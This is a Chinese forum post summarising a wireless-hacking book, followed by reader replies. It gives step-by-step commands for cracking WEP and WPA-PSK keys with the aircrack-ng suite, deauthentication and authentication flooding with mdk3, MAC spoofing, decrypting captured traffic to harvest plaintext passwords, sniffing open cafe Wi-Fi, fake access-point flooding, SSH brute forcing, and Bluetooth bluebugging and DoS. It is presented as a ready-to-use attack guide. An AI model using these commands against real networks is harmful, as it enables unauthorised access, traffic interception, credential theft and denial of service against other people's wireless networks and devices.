查看: 10891|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3719

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
TG-NET
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。  y, J" V5 x$ K/ u
+ o. P) v7 P6 h8 G% h, x" I( C
以下所有操作均在BackTrack 4中进行。
1 c# H% w$ H5 V8 M1 `" T. J
$ h! O8 E7 q8 A
8 x+ E4 G% a6 R. E. Z无线WEP加密P解:
; q' a5 @' x4 }0 m( |$ D3 H: m; ~5 ~' y& m% C( |8 f! Z
注入P解:- V, I4 B* v, B& w/ Q; C

; N8 E7 n8 f% p& X7 p* u- w9 o4 Jifconfig0 L# e9 ~* Y" d0 {
% J. i8 Z( y- @9 Z% h/ z, A
ifconfig –a: i3 W' c1 j) P( T3 I
0 B( s& @" u& I/ E  |, U. j
ifconfig wlan0(无线网卡) up! n, C& V& G# D

5 D: C8 ^" E3 wairmon-ng start wlan02 V. o+ e1 P  A8 [9 Y

5 }. J" W5 d% Y7 H- W% ]( U& a8 wairodump-ng mon0
7 m6 y5 o) m0 q/ w) x" V) }; y1 z8 e8 b/ |  H, h
airodump-ng --ivs –w ivsfile –c 频道 mon0或; p% x+ v" s  j+ t0 d' j2 p2 T& Y* B

& k$ [' W* I' ?4 R2 x8 ?+ jairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
5 N" h/ w6 _- L# w$ T' \4 Z% N# U* [- k7 ?: x$ A+ X
aireplay-ng -3 –b BSSID –h Station mon0
7 h* S, w1 P. y+ n' l2 ~7 V6 y
! U' g" x1 Y1 ~$ T7 taircrack-ng ivsfile-01.ivs- h; \1 x" x/ k$ o  o7 |: {
! y6 H  }/ {  k, I9 r- r5 c" l
虚连接P解(适用于无客户端连接APP解)
/ k/ M8 H% s( e* o" {% D4 `/ U  s4 i% k. N% m  k) j8 }7 Z
ifconfig  ]& _$ I4 D& q) F2 f2 {9 V. |
8 Y" h) \, {  K+ R2 }. A: `
ifconfig –a
3 V# ]6 x( ~; J* @1 {: i( N, f3 a# B2 i/ Y8 Q+ K* g# j9 v0 O/ `! D
ifconfig wlan0(无线网卡) up6 I5 q( C* W5 q+ C4 e5 T

$ k8 H  U5 Z9 }* }( N  ]airmon-ng start wlan0
9 K, E$ `8 X; t6 {1 d
, N2 g3 _7 b/ _6 \' J- pairodump-ng mon05 P5 F; h: t- G0 u; o- u
( {* d' L( b& @  s2 k8 h- |1 ^6 ?
airodump-ng --ivs –w ivsfile –c 频道 mon0或9 ]6 z& Z, x# o/ W

4 o3 k4 h* f* W  l1 r8 J- s' rairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
4 M8 q8 p. C8 `  I/ S: }5 T; P
0 S  S4 j& n+ l8 x' K$ A4 iaireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
& F: P# M$ h2 V: l1 A% n
( K6 `+ `5 W$ P: J7 K8 k( jaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon07 {3 J2 \" Q. N1 F; t
  Z, c* Y9 q  X* S/ p( m  d
aircrack-ng ivsfile-01.ivs
+ N3 C1 _7 d' Y& U( P
+ ?# t* h+ ^6 r
# ^0 X1 v9 w- K还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。) Q# e" ^! D5 S! O1 Y; }

& r+ Y) U, c& @. m# X. h" @8 Z% M8 S- _. q: n; n9 u5 N( d
WPA-PSKP解% t2 t/ y4 {' V
5 e( q9 Z8 g2 w7 }" w- a
ifconfig$ n! r6 J) M# O/ F  w
9 ^) b, h: p% T& U
ifconfig –a5 G3 R# p# E1 [6 o
' t4 h* @1 @) E4 ^2 }6 h! y9 h
ifconfig wlan0(无线网卡) up! b4 _2 r, E5 P3 p
  A6 U- [& M* I; b! V% ^' {+ g$ H
airmon-ng start wlan0: a' R) ^* H1 G

; R+ N5 h# L! p+ c% W) w, S1 n6 rairodump-ng mon0
7 C! B3 Q4 B6 A% ]. C$ e! Q9 ~3 f2 A! b$ O9 S- A( `
airodump-ng –w capfile –c 频道 mon0( x, D: k& ^; p* Z/ a" _, L  N

2 g" i& v/ S8 x9 @3 l6 L3 g' oaireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
3 z/ q3 _; \' N& E& _* \: X
' D2 \" B1 o6 w5 t0 d3 ]! Eaircrack-ng –w Dic capfile-01.cap或
8 w8 x1 c7 w: O+ Y/ m! C/ j' \/ Z! j
% c: F& ]( j5 T8 ^& Rcowpatty –f Dic –r capfile-01.cap –s SSID: D/ ^7 V+ z5 Z5 ^% G/ N
% _( v8 {' F3 I7 i5 c
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID6 y  T. d3 U$ F+ W5 g1 Y3 J

0 u; r7 x. u  h傻瓜式P解软件SpoonWPA。
7 i3 K/ q2 V' T- N& \' E2 `5 \
+ a- r+ W6 @0 e0 m, O3 [$ eBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst% q3 Z! G2 J0 z) x: y

: r/ K& d  l. o; V& b, t2 _5 |* C2 ?. \( N
字典文件的生成和上传0 c3 y1 @" \$ P

( s: z4 V; p1 z8 n! y0 k5 e在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。% T8 B, Z9 K# d# r& ?
' T" l( c) \) D; ^3 ~8 O. G4 v, J9 _

, \' O, G: X/ h4 L9 G3 a: R; P8 QBT4下开启Tftp:Services—TFTPD—start TFTPD/ b" {5 ^2 _! B, _2 e
4 ?/ A  D* U2 I4 j; u" x2 x/ }
在Windows的CMD中运行 tftp –i IP put **.dic
: m* i8 N" S4 j- V- ?0 E" m$ f6 c, o0 m0 @! S( ~. d+ D1 z

) Z' L* Z( o8 d/ O1 G8 v: I, ]BT4下开启SSH:Services—SSH—start SSH( G, h3 |- ^# }3 F
& N  u$ C) z3 j
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
1 [8 {$ s3 W+ u4 K: q7 i8 x1 n: c2 U0 e' j9 \; [# Y( Z
* [) C1 [# {: }8 U8 g
AP限制MAC时的解决
( p& T) d, R* F, p* l" B, ^
- e* ~# O- [) g# b# [# N6 L当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
3 \# l/ z9 @' e1 k3 B! g+ X
2 c  c" l( q( w& D! J, gifconfig wlan0 hw ether NewMAC" E& z) Y8 s- y0 t; ~
! p# G! i5 ]" E. M/ Z- R# [

) G; P% n: r. F关闭SSID广播的AP探测:1 ]2 V* g/ e5 D8 }4 W. i. i# v$ f

3 W' M- p. k  z- Y9 ?1.     Deauth攻击:' M. p( c2 B4 v, Z$ ?; }

7 Q, N6 O& K2 C- C+ S3 pairodump-ng mon0+ s: ^2 x9 p1 D
* a: s3 ]2 U4 N# G
aireplay-ng -0 10 –a BSSID –h Station mon0
$ T4 B! ]* d) D  c8 R, t3 J7 p
* P* i0 a7 Z4 ~* Z2.     抓包分析
' G8 l: M) l1 f8 q, A1 Z: [/ v5 X8 V8 l" a* f1 G
Omnipeek
! }1 v9 r3 |  K, n: @3 V3 n6 [* ]
& c6 g7 r7 D$ pTcpdump –n –e –vvv –i 网卡名" }: v* {4 S" S8 ^
# X3 S3 F3 q3 s4 [6 n
3.     暴力P解0 }0 M% _5 h+ S% k/ }$ }
- \4 i8 T/ }. f2 v! c
Charon 1.1暴力P解3 j) l2 T4 x: M3 }4 S

& ?8 N! E+ T1 b, \
5 ?* [+ [% @7 ]3 l, Z% l: p无线加密数据包的解密; O7 d' o6 ]' c5 `4 n8 C2 s! T  ]

) e( k; J8 f5 d/ d$ K' w+ B! I0 }: m* U1 Q  J, [
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。- h; h# a; ]- k: Y% U

; ^5 [  u% o$ q% ^. wFilterNS     DNS解析数据包: H9 w) h, N. a
* N, p& X+ D; ]8 c  ?
Filter:HTTP    WEB访问数据包
# i* L# x5 a# X. W, V
# p; Q$ [# ~5 e9 }$ @" j! j9 sFilter:msnms   MSN  a# h$ l5 B! Z/ c
, c: E6 `! |7 P+ M, r4 H, l8 q
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。0 [0 B4 ]( h, M9 @% `8 f% k

5 {" b- K. A: d使用airdecap-ng解密:  U! G7 {% q) R

6 p# P4 Z& `$ O) nAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap
( ~! k2 z+ g$ [. L" B0 O6 ]6 n6 m: s+ S9 I
2 m& I. x& j, D' M; o4 ^& R
咖啡馆中无线数据截取(开放式无加密AP)
9 p) {- C7 K6 U2 n9 T' w5 z/ c# P' z' c( O$ ]) e- v( w/ R0 b0 K( v" {
1.Airodump-ng –w data –c频道 mon0
* c( N9 ?! k& T8 R
8 t  k* Y. ~, b) Q% ^) s  B3 G2.使用WireShark打开分析$ B+ Q8 R( e) E1 P

( |. u/ S: y: F
) A. P* v! b6 g+ Q9 I# aBT4下的渗透工具:
! p, \! _6 r+ e! g, f$ `& t' ]6 K+ e8 `: C9 r
nmap –sP IP/24        判断C段下存活的主机 9 N6 }8 v8 B: J

, ^& j7 ]( ?( \) O7 Z- _% |nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
, k. f$ \% K0 t! m* q) U) z0 a
" x2 C8 ?) H4 @2 L, Pnmap –vv –sV IP –p port   指定端口的详细信息。。。$ L4 M1 W6 A- B) u0 X
' a8 I, H) Y/ \; I  s4 O2 Z% H$ T6 @' }
namp –O IP/24    判断主机的系统版本
% E% [  s  L* \" }, M. I; O# H, p% f+ Z

- N9 N, b3 j, V; VGUI 版nmap:Zenmap
0 x/ p$ p: h- ^- i% H; E, ]8 t, Q6 e+ M

+ d: f- @. m6 E# X, y4 GAmap使用:amap –B IP port# a, x* J4 \  [1 Y3 D& D* v7 k. `
" v6 p7 N  N# p3 X+ y3 p  m. y6 G
Nbtscan(扫描Windows网络NetBios信息):. }6 L' ^9 P. I: q6 z1 ]. e% T# Y
: G; P" m1 p6 t/ T- P
nbtscan –v –s : IP/24* Q- V: ]0 h0 p+ s+ U
" W7 Y) I4 Z( W" q+ J# z' l. }
nbtscan –r IP8 z. k+ z6 Y* I! x: r$ i

1 W  d1 g& T. c' D5 s5 `" I
6 F% g7 n1 c7 vDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
7 x: n/ P- u7 W) }
6 A  ^! Q, z0 m6 s6 y
1 o8 W; V1 ]% e0 e9 L1 JHydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)% q1 o* b( R( }. D( h) W  }# L

0 K+ r$ ]/ P7 |% o6 T0 g2 VBruteSSH: ./bruthe.py –h IP –u Username –d Dic9 }- H/ f; T8 v, t# k4 N

. ^% S, Q& ~+ I1 L! \Metasploit3使用& ?1 `  i2 W; D$ C1 D* `5 @
无线D.0.S1 u0 q5 v3 ?0 X3 b; P$ t/ n

2 a& S# S2 x% K- C9 b- u* @" I* L! T- S9 o# s& x# r& t! `+ R
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)+ Q. @6 h# g0 b  ]

$ c3 V" m) L  v5 q/ Gairmon-ng start wlan0# u& }. |. h, [, x% e& b8 l5 y. m' q

  W! q0 U4 s' t+ qairodump-ng mon0/ y4 x; W  m# l: u
+ Q. I' G! q! t
mdk3 mon0 a –a BSSID
' }/ `2 H( E, m. G& K; S* Y  l
对所有的AP攻击:mdk3 mon0 a
  `* o$ d9 [  N) ]' m$ ]
; F: u* E3 c& }! g
+ ~# F- a) j: z6 LDeauth Flood 攻击
" C# a# Q' d9 q# s0 P7 m- d  }2 i) q/ [  n$ r/ H% J7 u, i
mdk3 mon0 d –c Channel' b& N+ @) I) K8 @' h* ~4 c) n
7 K6 t- a) o; S# L
图形化D.O.S攻击:Charon4 e0 `5 q' k* b9 Q0 I
% J5 @% z# i* k3 ?+ X- i

* P1 w. |5 c) e( d5 c当受到攻击时,使用Wireshark抓包可以看到异常信息。& b$ P  P) O; g7 J
* S0 H* O8 E9 O$ b

) a& d% u, e8 u& r5 MWPA-PSK高速P解( k( T) r" \- r& s3 a

% O( }  r+ y+ J# h) C' q# r1.       WPA-PSK PMK Hash TablesP解
# `6 L, p( h  a
4 V4 j% G5 G% VCowpatty –d HashTable.hash –r ***.cap –s SSID5 ~3 T6 L/ h0 P$ y4 |' K& v

  i/ R7 U" T  g9 XHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
# r! X( Z# h2 [$ m5 B) n9 V
2 k5 U2 s# F. y0 @5 v9 p2.       GPU辅助高速P解
% G5 Y# E6 K8 w8 u! A: d7 e  C4 F4 j0 V6 K" j5 k0 m3 J
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。: _: I- @& x0 I1 u' E  a/ G4 i
, [- e9 u5 ]7 J  m8 x; g( ^
3.       分布式P解
' `# ~! a7 A( [2 v# R* r  t2 O! W
3 s% _; r/ S* K5 N  q; G
+ s- \2 k) R/ W; I( X. J/ iAP的伪造5 G0 J; V* V# `( S( W/ v

9 p" e; J4 [) f+ h把AP的MAC改成目标AP的MAC
5 H6 [1 M2 G2 {
8 ^4 w7 A* x3 T0 t网卡软AP% U! p  m1 j6 w  b/ P$ C4 _
  S+ m* ?/ _% D# r$ w1 ~7 s/ _9 H

8 J/ X0 _' }3 b; h; ]4 Q伪造大量虚假AP信号:
, E2 W7 f4 e9 F0 G& ?7 T1 Y) s- V' Y* P
随机SSID:mdk3 mon0 b –g –c 频道
9 l' d( r- V* H0 x6 T6 B7 J
4 R, R/ ?! g" R4 t指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度/ `% U& P4 m; g& n
! z; P1 R( B# K2 _+ k7 [1 G
+ h  T! c! j5 j. z5 M* W6 Q3 w! k
War-Driving0 O! X% I7 I; q% A. Z! ?3 k

% N. S1 D8 f3 l0 H) c9 f/ c热点地图绘制9 X, o3 Q6 v4 x
2 ~& i8 J0 I4 {" t9 K& P7 Y3 C8 b/ n
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
8 _) J4 V% @  `' g: X; @# R$ D7 c9 o3 v1 |

) Y4 p0 i& a8 k) g3 c! u0 eNetstumble
. K. {9 _1 ]7 F
/ F+ u' P1 P% u3 {7 I; |6 a+ L! v' ~* f0 Q. S7 ?3 X
蓝牙Hacking
& G6 X4 ], ~& R& Q; h; c: @4 [3 F  C' r: Y1 b) Y" w$ z; z; [" p4 e0 z' s
Windows下的Blue Soleil工具/ o. M6 |  m# i% D
7 _7 T- h  @9 D0 c& B
BT4:
: w+ s% p" {* Y7 W  u8 @2 b0 p+ W0 i1 C/ S
hciconfig 查看蓝牙适配器8 w$ I' q- p3 A* g2 p
: o& z' g& @- {. L" X& Z9 s+ S& c1 B
hciconfig hci0 up 载入蓝牙适配器& Z$ H( Z, v' \+ @
/ ?6 S% A: f, l7 y
hciconfig hci0 class 蓝牙适配器详细信息
6 M: X7 F3 K* a% ^- r" G& U  u* I/ [" q  C$ f2 H
$ R5 I+ Y4 c; Q8 D
hcitool(扫描蓝牙)3 L% M% g' ]$ v  f& t
/ t( u* E/ O1 @( C$ @
hcitool –i hci0 scan
" B  k1 p& v! F& D
% U, U8 |. t4 G% x) o" X% s2 }/ bBTscanner(扫描蓝牙)
9 E' M( X( O/ v2 M9 Y8 M% s5 E7 y# j- T8 g
8 a1 Q2 F5 t/ s" F, {$ ^( y  e% g+ B% x
蓝牙攻击:
, H) v4 Y, m9 W2 y2 J+ G( d( c& p
! q( s& o/ }) H! ~% y7 t7 \/ d0 rBlueBugging (适用于BlueTooth V1.1的手机)
& C6 P4 V- D5 Q, M4 P1 N* |
8 h, H, ?3 F2 N8 C$ XBluebugger工具:9 \5 A% |' @! t. M: ^

. m# U- _$ Z. @% r7 }Bulebugger –a HD_Addr info
$ h( `6 ^9 \5 P! C( G2 _- ~  T( x
' a! v' }5 T4 Q5 t1 U, n8 w1 A7 x  @" M, f' A' t9 n! Q
BlueJacking
+ }, Y2 {6 r4 P. F; D  E) F' F5 U" G+ @* ~' b# s# y. ?, O1 X
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
- n9 ?! Z' r+ o4 Z
' m& N/ Z6 p: G0 ]1 e) V3 N7 T
, d. ]+ O0 z9 _5 J, N  a" a, T$ z+ CHD_Addr修改:1 p* V5 X) P2 H8 @

+ B' [7 Q# D' `$ ^2 t; U' G' R) G/ vBdaddr工具
* @+ U% B$ F8 U# X- t$ y! r- n" `% W7 u$ P' ]
bdaddr –i 蓝牙设备名 新HD_addr
+ a# U6 `% T8 J9 R6 `) i" {6 k
( I/ F1 [6 M2 U% ]: H: H1 K+ F! P
+ Z- a. ~7 ]1 x! ^蓝牙D.O.S
  I: d$ s2 f- Y$ T; h6 ~+ V. c  w0 K4 A: G
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
% ~9 X; U3 `, _1 O+ s) P" `8 m( @* a* L; p4 ~, T+ P
hciconfig% M( H6 w, M( F, R
- e5 d5 G0 _1 b5 T4 g; u
hciconfig hci0 up4 `" i9 _$ f; ?$ p% N' B' g" c
" b( J+ P' @; l0 n  s
hcitool –i hci0 scan
1 O- J- _: ~; I: R) x" @/ x
, h9 z! Z( Z6 X. c* B1 v4 rl2ping –s 10000 –目标MAC
% K0 `8 K. |* E3 _2 {& Q) [- d6 S. |4 c1 x6 U) W' q

1 j4 |5 `& A; s7 `不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
* W/ [6 R2 D  h, ?' ?' k: B( [$ [+ o  Z8 g6 N
./fang –r ************-############ -s% h, F7 U* U. \* n! H

0 V4 j) u* U' c6 d1 ?暴力P解************-############的蓝牙设备4 o- R9 e$ P- g. i/ i6 }+ [/ d

9 Y. |, _! O' ?7 q$ Z& i4 R$ Q./fang –l 各厂商BD_Addr分配0 c. z  I+ k: R/ Q
, p2 A7 ?7 r, z5 P
/ U+ q# ?8 G& [  o9 [9 h) ~- |: r2 _
WifiZoo使用2 x. K' m# f. M8 j/ {: q) n3 D
2 Y6 B! X- U" }- A; P) t, R# q7 a
./wifizoo.py –c Capfile6 Z/ @2 D" n( H2 q7 p: p

% j* I! P9 ~) Y5 X6 {" {* \访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

140

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

909

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。9 Q" k) n6 b" {* L& h! H
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的- I' ?3 t* h1 S. n
呵呵 其实也不贵 21块 快递再一点
% m0 ?9 Q( J* d: A4 X  J我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2017-1-22 20:26

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表